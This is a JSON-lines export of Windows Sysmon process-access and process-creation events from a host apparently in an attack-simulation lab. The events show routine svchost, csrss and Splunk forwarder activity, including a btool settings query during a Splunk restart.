{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nTargetProcessId: 4864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","TargetProcessId":"4864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.693\r\nProcessGuid: {E2A3D6B1-10FF-5F25-0000-001014590500}\r\nProcessId: 4824\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nParentProcessId: 4864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.693","ProcessGuid":"{E2A3D6B1-10FF-5F25-0000-001014590500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","ParentProcessId":"4864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nSourceProcessId: 4864\r\nSourceThreadId: 4872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-001014590500}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","SourceProcessId":"4864","SourceThreadId":"4872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-001014590500}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-001014590500}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-001014590500}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
